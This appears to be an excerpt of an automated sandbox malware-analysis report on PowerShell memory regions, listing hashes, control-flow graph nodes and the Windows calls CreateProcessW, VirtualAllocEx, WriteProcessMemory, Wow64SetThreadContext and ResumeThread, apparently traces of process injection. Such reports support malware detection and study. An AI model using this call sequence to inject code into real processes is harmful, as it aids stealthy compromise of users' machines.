                                                                                  • Source File: 00000007.00000002.2469098042.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_d9d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d3ed3cb21867573c7dc6a5d83b0db50b2a1b3244ba586dda7d4be5c610dfdb8
                                                                                  • Instruction ID: 39a6f922cb5a5a899939072639badca8471e8fb793ad8f993faf7fc088cc14df
                                                                                  • Opcode Fuzzy Hash: 9d3ed3cb21867573c7dc6a5d83b0db50b2a1b3244ba586dda7d4be5c610dfdb8
                                                                                  • Instruction Fuzzy Hash: F4014C6100E3C09FD7128B258C94B52BFB4EF57224F1DC4DBD9888F2A3C2695849C772
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2469769417.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_4740000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 624c8689cf5ac79207a4fac9526ba61d8b9b2b9422d46afafbe3700f2c156b04
                                                                                  • Instruction ID: 44f98a53a6b5e15fd82df3cd98178a404399ba950097db91adfba9aab66c2fbd
                                                                                  • Opcode Fuzzy Hash: 624c8689cf5ac79207a4fac9526ba61d8b9b2b9422d46afafbe3700f2c156b04
                                                                                  • Instruction Fuzzy Hash: 94F0B735A001059FCB15CB9DD990AEEF7B1FF88324F208159E515A72A1C732AC52CB50

                                                                                  Execution Graph

                                                                                  Execution Coverage:3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:20
                                                                                  Total number of Limit Nodes:3
                                                                                  execution_graph 12381 4e9b781 12382 4e9b718 WriteProcessMemory 12381->12382 12384 4e9b74b 12382->12384 12385 4e9b500 12386 4e9b54c Wow64SetThreadContext 12385->12386 12387 4e9b542 12385->12387 12388 4e9b57a 12386->12388 12387->12386 12389 4e9b2a0 12390 4e9b31b CreateProcessW 12389->12390 12392 4e9b3f9 12390->12392 12393 4e96170 12395 4e96199 12393->12395 12394 4e962c4 12395->12394 12397 4e9992c 12395->12397 12401 4e9993f 12397->12401 12398 4e999ef 12398->12395 12401->12398 12402 4e99f8b VirtualAllocEx 12401->12402 12404 4e9a7f8 ResumeThread 12401->12404 12403 4e99fde 12402->12403 12405 4e99b8f 12404->12405
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-695528588
                                                                                  • Opcode ID: 664d06c9939662e2143acd50251f1942b0972c958945a3528205ecd657e2a3a9
                                                                                  • Instruction ID: 48922346379ff1f1fe86fbd74b54e67832a09d39857241959a0c212ed09c4d78
                                                                                  • Opcode Fuzzy Hash: 664d06c9939662e2143acd50251f1942b0972c958945a3528205ecd657e2a3a9
                                                                                  • Instruction Fuzzy Hash: 6D4210B1B0020ADFCB298F69C4547BABBF6FFC5210F14846ADD658B251DB31C885CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 227 7a503e0-7a50403 228 7a505de-7a505e6 227->228 229 7a50409-7a5040e 227->229 239 7a505ef-7a5060d 228->239 240 7a505e8-7a505ed 228->240 230 7a50426-7a5042a 229->230 231 7a50410-7a50416 229->231 235 7a50430-7a50434 230->235 236 7a5058b-7a50595 230->236 233 7a50418 231->233 234 7a5041a-7a50424 231->234 233->230 234->230 237 7a50447 235->237 238 7a50436-7a50445 235->238 241 7a50597-7a505a0 236->241 242 7a505a3-7a505a9 236->242 243 7a50449-7a5044b 237->243 238->243 244 7a5061d 239->244 245 7a5060f-7a5061b 239->245 240->239 247 7a505af-7a505bb 242->247 248 7a505ab-7a505ad 242->248 243->236 249 7a50451-7a50471 243->249 250 7a5061f-7a50621 244->250 245->250 251 7a505bd-7a505db 247->251 248->251 269 7a50490 249->269 270 7a50473-7a5048e 249->270 253 7a50623-7a50629 250->253 254 7a5066d-7a50677 250->254 255 7a50637-7a50654 253->255 256 7a5062b-7a5062d 253->256 259 7a50682-7a50688 254->259 260 7a50679-7a5067f 254->260 267 7a50656-7a50667 255->267 268 7a506ba-7a506bf 255->268 256->255 261 7a5068e-7a5069a 259->261 262 7a5068a-7a5068c 259->262 266 7a5069c-7a506b7 261->266 262->266 267->254 268->267 273 7a50492-7a50494 269->273 270->273 273->236 276 7a5049a-7a5049c 273->276 277 7a504ac 276->277 278 7a5049e-7a504aa 276->278 280 7a504ae-7a504b0 277->280 278->280 280->236 282 7a504b6-7a504d6 280->282 285 7a504ee-7a504f2 282->285 286 7a504d8-7a504de 282->286 289 7a504f4-7a504fa 285->289 290 7a5050c-7a50510 285->290 287 7a504e0 286->287 288 7a504e2-7a504e4 286->288 287->285 288->285 291 7a504fc 289->291 292 7a504fe-7a5050a 289->292 293 7a50517-7a50519 290->293 291->290 292->290 295 7a50531-7a50588 293->295 296 7a5051b-7a50521 293->296 297 7a50525-7a50527 296->297 298 7a50523 296->298 297->295 298->295
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                  • API String ID: 0-2353078639
                                                                                  • Opcode ID: e4b3e851fc386689f89d7da9267efe68ad5655049bad51a938181d882d198f02
                                                                                  • Instruction ID: 6a18eeaae036db86602b0514fa3d84ba487c82ad6426337f457f26c68675897c
                                                                                  • Opcode Fuzzy Hash: e4b3e851fc386689f89d7da9267efe68ad5655049bad51a938181d882d198f02
                                                                                  • Instruction Fuzzy Hash: DF7167B17043069FCB285B39881076BBBFAAFD1710F24C47AEC65CB281DA35C941C7A2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 300 7a503c0-7a503c2 301 7a503c4-7a503c8 300->301 302 7a503cb-7a503d4 300->302 301->302 304 7a503d6-7a503d9 302->304 305 7a503dc-7a50403 302->305 304->305 307 7a505de-7a505e6 305->307 308 7a50409-7a5040e 305->308 318 7a505ef-7a5060d 307->318 319 7a505e8-7a505ed 307->319 309 7a50426-7a5042a 308->309 310 7a50410-7a50416 308->310 314 7a50430-7a50434 309->314 315 7a5058b-7a50595 309->315 312 7a50418 310->312 313 7a5041a-7a50424 310->313 312->309 313->309 316 7a50447 314->316 317 7a50436-7a50445 314->317 320 7a50597-7a505a0 315->320 321 7a505a3-7a505a9 315->321 322 7a50449-7a5044b 316->322 317->322 323 7a5061d 318->323 324 7a5060f-7a5061b 318->324 319->318 326 7a505af-7a505bb 321->326 327 7a505ab-7a505ad 321->327 322->315 328 7a50451-7a50471 322->328 329 7a5061f-7a50621 323->329 324->329 330 7a505bd-7a505db 326->330 327->330 348 7a50490 328->348 349 7a50473-7a5048e 328->349 332 7a50623-7a50629 329->332 333 7a5066d-7a50677 329->333 334 7a50637-7a50654 332->334 335 7a5062b-7a5062d 332->335 338 7a50682-7a50688 333->338 339 7a50679-7a5067f 333->339 346 7a50656-7a50667 334->346 347 7a506ba-7a506bf 334->347 335->334 340 7a5068e-7a5069a 338->340 341 7a5068a-7a5068c 338->341 345 7a5069c-7a506b7 340->345 341->345 346->333 347->346 352 7a50492-7a50494 348->352 349->352 352->315 355 7a5049a-7a5049c 352->355 356 7a504ac 355->356 357 7a5049e-7a504aa 355->357 359 7a504ae-7a504b0 356->359 357->359 359->315 361 7a504b6-7a504d6 359->361 364 7a504ee-7a504f2 361->364 365 7a504d8-7a504de 361->365 368 7a504f4-7a504fa 364->368 369 7a5050c-7a50510 364->369 366 7a504e0 365->366 367 7a504e2-7a504e4 365->367 366->364 367->364 370 7a504fc 368->370 371 7a504fe-7a5050a 368->371 372 7a50517-7a50519 369->372 370->369 371->369 374 7a50531-7a50588 372->374 375 7a5051b-7a50521 372->375 376 7a50525-7a50527 375->376 377 7a50523 375->377 376->374 377->374
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$$]q$$]q
                                                                                  • API String ID: 0-3019551829
                                                                                  • Opcode ID: e8c9389ff5df78d07d86e4981054316fe89e175cd1299abe1ef69de66e403a5e
                                                                                  • Instruction ID: 4357d9fbb861298a2a41a3d8f13f264247032be40fe7d0a5897b0e8214a4168b
                                                                                  • Opcode Fuzzy Hash: e8c9389ff5df78d07d86e4981054316fe89e175cd1299abe1ef69de66e403a5e
                                                                                  • Instruction Fuzzy Hash: 0E3101F1A143069FDB204F35951077B7BF9AF92320F288066DC25CB285EB35C980C762

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 379 7a503cf-7a503d4 380 7a503d6-7a503d9 379->380 381 7a503dc-7a50403 379->381 380->381 383 7a505de-7a505e6 381->383 384 7a50409-7a5040e 381->384 394 7a505ef-7a5060d 383->394 395 7a505e8-7a505ed 383->395 385 7a50426-7a5042a 384->385 386 7a50410-7a50416 384->386 390 7a50430-7a50434 385->390 391 7a5058b-7a50595 385->391 388 7a50418 386->388 389 7a5041a-7a50424 386->389 388->385 389->385 392 7a50447 390->392 393 7a50436-7a50445 390->393 396 7a50597-7a505a0 391->396 397 7a505a3-7a505a9 391->397 398 7a50449-7a5044b 392->398 393->398 399 7a5061d 394->399 400 7a5060f-7a5061b 394->400 395->394 402 7a505af-7a505bb 397->402 403 7a505ab-7a505ad 397->403 398->391 404 7a50451-7a50471 398->404 405 7a5061f-7a50621 399->405 400->405 406 7a505bd-7a505db 402->406 403->406 424 7a50490 404->424 425 7a50473-7a5048e 404->425 408 7a50623-7a50629 405->408 409 7a5066d-7a50677 405->409 410 7a50637-7a50654 408->410 411 7a5062b-7a5062d 408->411 414 7a50682-7a50688 409->414 415 7a50679-7a5067f 409->415 422 7a50656-7a50667 410->422 423 7a506ba-7a506bf 410->423 411->410 416 7a5068e-7a5069a 414->416 417 7a5068a-7a5068c 414->417 421 7a5069c-7a506b7 416->421 417->421 422->409 423->422 428 7a50492-7a50494 424->428 425->428 428->391 431 7a5049a-7a5049c 428->431 432 7a504ac 431->432 433 7a5049e-7a504aa 431->433 435 7a504ae-7a504b0 432->435 433->435 435->391 437 7a504b6-7a504d6 435->437 440 7a504ee-7a504f2 437->440 441 7a504d8-7a504de 437->441 444 7a504f4-7a504fa 440->444 445 7a5050c-7a50510 440->445 442 7a504e0 441->442 443 7a504e2-7a504e4 441->443 442->440 443->440 446 7a504fc 444->446 447 7a504fe-7a5050a 444->447 448 7a50517-7a50519 445->448 446->445 447->445 450 7a50531-7a50588 448->450 451 7a5051b-7a50521 448->451 452 7a50525-7a50527 451->452 453 7a50523 451->453 452->450 453->450
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$$]q$$]q
                                                                                  • API String ID: 0-3019551829
                                                                                  • Opcode ID: 2060a4bc7d75fcd68afe688bf48c34d9ddc1d3c4144a48e5787d55f066588b84
                                                                                  • Instruction ID: 45dd03131db4bbbd66aa9214e446c972f33911cad2404b38021fe3f4f66235df
                                                                                  • Opcode Fuzzy Hash: 2060a4bc7d75fcd68afe688bf48c34d9ddc1d3c4144a48e5787d55f066588b84
                                                                                  • Instruction Fuzzy Hash: 2131CCF1A142069FDB248F35951077B7BF9AF91720F288166DC25CB295EB35C980C7A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$$]q$$]q
                                                                                  • API String ID: 0-3019551829
                                                                                  • Opcode ID: 8027c19ec81ac4e7335cdbcdc1ee392a216afab1f712567fbe652e8e09987e85
                                                                                  • Instruction ID: 5998928137f762f4e8a336dc07951d7586a5224c4370a286da0f5c39d5e49e9c
                                                                                  • Opcode Fuzzy Hash: 8027c19ec81ac4e7335cdbcdc1ee392a216afab1f712567fbe652e8e09987e85
                                                                                  • Instruction Fuzzy Hash: 073180F1A0030EDFCB298F29C5807757BF1AF86612F1985AADC648B151D734CD85CB62

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 684 4e9b294-4e9b319 686 4e9b31b-4e9b31e 684->686 687 4e9b321-4e9b328 684->687 686->687 688 4e9b32a-4e9b330 687->688 689 4e9b333-4e9b349 687->689 688->689 690 4e9b34b-4e9b351 689->690 691 4e9b354-4e9b3f7 CreateProcessW 689->691 690->691 693 4e9b3f9-4e9b3ff 691->693 694 4e9b400-4e9b478 691->694 693->694 701 4e9b48a-4e9b491 694->701 702 4e9b47a-4e9b480 694->702 703 4e9b4a8 701->703 704 4e9b493-4e9b4a2 701->704 702->701 706 4e9b4a9 703->706 704->703 706->706
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04E9B3E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: a91cdd0f14ad2fca590113b5d906defd2d81f2610c418f1d45b90617c0188537
                                                                                  • Instruction ID: fcedce0b2580eaa38654366e1714bd27b22777cd99acfdefbe688bfe94243484
                                                                                  • Opcode Fuzzy Hash: a91cdd0f14ad2fca590113b5d906defd2d81f2610c418f1d45b90617c0188537
                                                                                  • Instruction Fuzzy Hash: D4512971901219DFDF24CF99D980BDDBBB5BF48304F1481AAE908B7250E775AA88CF90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 707 4e9b2a0-4e9b319 708 4e9b31b-4e9b31e 707->708 709 4e9b321-4e9b328 707->709 708->709 710 4e9b32a-4e9b330 709->710 711 4e9b333-4e9b349 709->711 710->711 712 4e9b34b-4e9b351 711->712 713 4e9b354-4e9b3f7 CreateProcessW 711->713 712->713 715 4e9b3f9-4e9b3ff 713->715 716 4e9b400-4e9b478 713->716 715->716 723 4e9b48a-4e9b491 716->723 724 4e9b47a-4e9b480 716->724 725 4e9b4a8 723->725 726 4e9b493-4e9b4a2 723->726 724->723 728 4e9b4a9 725->728 726->725 728->728
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04E9B3E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: bc66fc1ad9f3a7f8d4cdaa1e78a260e09a4569e3752b0ff5a53274c4044dbf0e
                                                                                  • Instruction ID: 44f917f202bcc0f994496d1ad18d807c1f8cd032db53d48b8df67b67cd20a8d1
                                                                                  • Opcode Fuzzy Hash: bc66fc1ad9f3a7f8d4cdaa1e78a260e09a4569e3752b0ff5a53274c4044dbf0e
                                                                                  • Instruction Fuzzy Hash: AE512771901229DFDF24CF99C980BDDBBB5BF48304F1480AAE908B7250D775AA89CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 729 4e9b6b8-4e9b706 731 4e9b708-4e9b70e 729->731 732 4e9b710-4e9b749 WriteProcessMemory 729->732 731->732 733 4e9b74b-4e9b751 732->733 734 4e9b752-4e9b773 732->734 733->734
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E9B73C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: 500ac2f12563b72086132a93a2c4aa2eed332242da1ed00c3433f8c2a2a276fd
                                                                                  • Instruction ID: 9aee2ab024064ed0a6aafd2e632e98ff927ba1e7edca552eb0e8bfd2b6e4072c
                                                                                  • Opcode Fuzzy Hash: 500ac2f12563b72086132a93a2c4aa2eed332242da1ed00c3433f8c2a2a276fd
                                                                                  • Instruction Fuzzy Hash: 4B21F5B59003199FDB10CF9AD885ADEBBF4FF49320F508529E958A7240D378A944CBA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 736 4e9b6c0-4e9b706 737 4e9b708-4e9b70e 736->737 738 4e9b710-4e9b749 WriteProcessMemory 736->738 737->738 739 4e9b74b-4e9b751 738->739 740 4e9b752-4e9b773 738->740 739->740
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E9B73C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: 2aa7685fbe433ff22557001bc5aa2fcf79ec92155229a402f241e6021577c60d
                                                                                  • Instruction ID: 0f464671576cc051a1f59d707414b046a992da8eb801ddc6b6b23d0c0cfb04ad
                                                                                  • Opcode Fuzzy Hash: 2aa7685fbe433ff22557001bc5aa2fcf79ec92155229a402f241e6021577c60d
                                                                                  • Instruction Fuzzy Hash: 0921E7B59003599FDB10CF99D885BDEBBF4FF48310F508529E518A7240D378A944CBA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 742 4e9b4f9-4e9b540 744 4e9b54c-4e9b578 Wow64SetThreadContext 742->744 745 4e9b542-4e9b54a 742->745 746 4e9b57a-4e9b580 744->746 747 4e9b581-4e9b5a2 744->747 745->744 746->747
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E9B56B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: aa1107153a9d8a710ad7e7c9b04165543f931e1f59fd3cc526e88bc692a9fb64
                                                                                  • Instruction ID: 12276036166c65a01a33ccd1e0691e67ad229500b298689dd5271bf47a21e1a0
                                                                                  • Opcode Fuzzy Hash: aa1107153a9d8a710ad7e7c9b04165543f931e1f59fd3cc526e88bc692a9fb64
                                                                                  • Instruction Fuzzy Hash: 5F1103B2D002498FDB10CFAAD844BDEFBF5FB89320F148529D468A7250D378A545CFA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 749 4e9b500-4e9b540 750 4e9b54c-4e9b578 Wow64SetThreadContext 749->750 751 4e9b542-4e9b54a 749->751 752 4e9b57a-4e9b580 750->752 753 4e9b581-4e9b5a2 750->753 751->750 752->753
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E9B56B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 270ad2dd50e85c9d02407f862308442ae3de456fb3aa7ba5de184006e052c922
                                                                                  • Instruction ID: ffd3defc99f9d0f6aaa4ad3a99ee37b8e571d1c9e5321cbff6ed6c6695f18a64
                                                                                  • Opcode Fuzzy Hash: 270ad2dd50e85c9d02407f862308442ae3de456fb3aa7ba5de184006e052c922
                                                                                  • Instruction Fuzzy Hash: 951102B2D002498FDB10CF9AD844BDEFBF9FB89320F14852AD458A3240D378A945CFA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 755 4e9b781-4e9b78d 758 4e9b729-4e9b749 WriteProcessMemory 755->758 759 4e9b721-4e9b727 755->759 760 4e9b74b-4e9b751 758->760 761 4e9b752-4e9b773 758->761 759->758 760->761
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04E9B73C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: 397a0ed7b8d56b44a09a31b5f642952d0d09a8b42a90653254f8300b043c94cd
                                                                                  • Instruction ID: 8b7518e75cccf1d9cbc7109a121e9b79a5d0f18641cadc4bad7adf9dd47b767f
                                                                                  • Opcode Fuzzy Hash: 397a0ed7b8d56b44a09a31b5f642952d0d09a8b42a90653254f8300b043c94cd
                                                                                  • Instruction Fuzzy Hash: 8201A2718083448EDB219FA8D8047EDBFF4AF4A324F04835AD064A31E2C3386844DB25

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 763 4e9a7f8-4e9a839 ResumeThread 764 4e9a83b-4e9a841 763->764 765 4e9a842-4e9a84f 763->765 764->765 766 4e9a855 765->766 767 4e99bf6-4e99c05 765->767 768 4e99b8f-4e99b92 767->768 770 4e99b98 768->770 771 4e9ad06-4e9ad0b 768->771 770->767 772 4e9ad1b-4e9ad46 771->772 773 4e9ae94-4e9ae97 771->773 787 4e9ad48-4e9ad53 772->787 788 4e9acf7 772->788 774 4e9ae99 773->774 775 4e9aea0-4e9aea5 773->775 774->772 777 4e9ae6b-4e9ae7f 774->777 778 4e9acfc-4e9ad01 774->778 779 4e9ae10-4e9ae3e 774->779 780 4e9ad85-4e9ad9e 774->780 775->768 777->768 781 4e9ae85-4e9ae88 777->781 778->768 779->768 785 4e9ae44 779->785 780->768 782 4e9ada4-4e9ada6 780->782 781->768 782->768 785->768 787->768 788->778
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 58489017d74d1966addebf59c5a0847bc7ca1fde1ac4090ac1f561530a2cf0e0
                                                                                  • Instruction ID: 8f2b8819069f03b4a1902ac917ff109e9be5482cf451003f99c5780f8df3a87a
                                                                                  • Opcode Fuzzy Hash: 58489017d74d1966addebf59c5a0847bc7ca1fde1ac4090ac1f561530a2cf0e0
                                                                                  • Instruction Fuzzy Hash: 8AF049B4904298CADF608F14C948399BAE1AB16319F28C5D9D649A63C1D3B96DC4CF02

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 789 4e99f8b-4e99fdc VirtualAllocEx 790 4e99fde-4e99fe4 789->790 791 4e99fe5-4e99ff2 789->791 790->791
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: d36888c9dedb72c97448654f1754425c1050580c5eb1f1e18ba42e4d755bbbc8
                                                                                  • Instruction ID: 22533c9bafbf845122b69f98dddfb05df2a47c0ee9bedeb1c8ea2a08906ca7d8
                                                                                  • Opcode Fuzzy Hash: d36888c9dedb72c97448654f1754425c1050580c5eb1f1e18ba42e4d755bbbc8
                                                                                  • Instruction Fuzzy Hash: B1F0D4B0904268DFEF269F54C848B98BFB1AB18304F14C4CAE64DA6391C3B95AC4CF12

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 793 7a50858-7a5087f 794 7a50881-7a50886 793->794 795 7a508ac-7a508b6 793->795 796 7a5089e-7a508a6 794->796 797 7a50888-7a5088e 794->797 802 7a508bf-7a508c6 795->802 803 7a508b8-7a508bb 795->803 801 7a508ab 796->801 798 7a50890 797->798 799 7a50892-7a5089c 797->799 798->796 799->796 805 7a508c7-7a508c8 802->805 803->802 805->805 806 7a508ca-7a508e2 805->806 808 7a509a2-7a509cf 806->808 809 7a508e8-7a508f9 806->809 814 7a509d1-7a509d6 808->814 815 7a509fc-7a50a06 808->815 812 7a50913-7a50930 809->812 813 7a508fb-7a50901 809->813 812->808 828 7a50932-7a50954 812->828 816 7a50905-7a50911 813->816 817 7a50903 813->817 818 7a509ee-7a509fb 814->818 819 7a509d8-7a509de 814->819 824 7a50a0f-7a50a32 815->824 825 7a50a08-7a50a0e 815->825 816->812 817->812 821 7a509e0 819->821 822 7a509e2-7a509ec 819->822 821->818 822->818 834 7a50a34 824->834 835 7a50a3b-7a50a4f 824->835 825->824 832 7a50956-7a5095c 828->832 833 7a5096e-7a50986 828->833 836 7a50960-7a5096c 832->836 837 7a5095e 832->837 841 7a50994-7a5099f 833->841 842 7a50988-7a5098a 833->842 834->835 836->833 837->833 842->841
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tP]q
                                                                                  • API String ID: 0-2175968468
                                                                                  • Opcode ID: 768d039d6a58b8821bdbb1798d0eab6990af798ff05daa1f3aeef7068d39787e
                                                                                  • Instruction ID: 9b0afe863e5c6213b77e56c0ad9a4b7cded1930911cf50170d09edf7b06979b2
                                                                                  • Opcode Fuzzy Hash: 768d039d6a58b8821bdbb1798d0eab6990af798ff05daa1f3aeef7068d39787e
                                                                                  • Instruction Fuzzy Hash: AC4158B0A09381DFC7128B348854A6BBFB1AFC6300F1984DBE8949F297C7318D45C3A2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
